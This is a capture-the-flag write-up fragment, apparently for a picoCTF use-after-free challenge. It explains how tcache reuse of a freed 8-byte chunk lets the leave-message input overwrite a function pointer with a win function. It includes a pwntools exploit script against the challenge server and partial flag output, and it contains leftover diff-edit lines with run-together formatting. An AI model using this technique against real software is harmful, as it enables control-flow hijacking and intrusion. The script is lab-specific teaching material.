Description

 Tried: Assume the function pointer fires immediately when the menu option is chosen, without looking for a secondary dispatch function.

-Reclaim the chunk, overwrite the fn pointerObservationI noticed the 'L' (leave message) path allocates an 8-byte buffer, the same size as the freed user struct, which suggested that tcache's LIFO policy would return the freed chunk to the 'L' path and let us overwrite whatToDo with the address of hahaexploitgobrrr.Send 'I' and confirm with 'Y' to free the user struct.
+ObservationThe leave-message path allocates an 8-byte buffer, the same size as the freed user struct. tcache is LIFO, so it hands that exact chunk back, which lets you overwrite whatToDo with the address of hahaexploitgobrrr.Send 'I' and confirm with 'Y' to free the user struct.
 Then send 'L' to leave a message: this calls malloc(8), which tcache hands back the just-freed chunk.
 Writing p32(win) + p32(0) overwrites whatToDo with the win address.
 On the very next main-loop iteration, doProcess(user) calls user->whatToDo() and lands in hahaexploitgobrrr.pythonpython3 - <<'EOF' from pwn import * elf = ELF('./vuln') win = elf.sym['hahaexploitgobrrr'] p = remote('mercury.picoctf.net', <PORT_FROM_INSTANCE>) p.sendlineafter(b'>', b'S') # leak: prints hahaexploitgobrrr address p.sendlineafter(b'>', b'I') # inquire about deletion: free(user); ptr not nulled p.sendlineafter(b'(Y/N)?', b'Y') p.sendlineafter(b'>', b'L') # leave message: malloc(8) reuses freed chunk p.sendlineafter(b'message:', p32(win) + p32(0)) # main loop calls doProcess(user) -> user->whatToDo() -> hahaexploitgobrrr print(p.recvall(timeout=2).decode(errors='ignore')) EOFExpected output

 picoCTF{d0ubl3_j30p4rdy_...}What didn't work first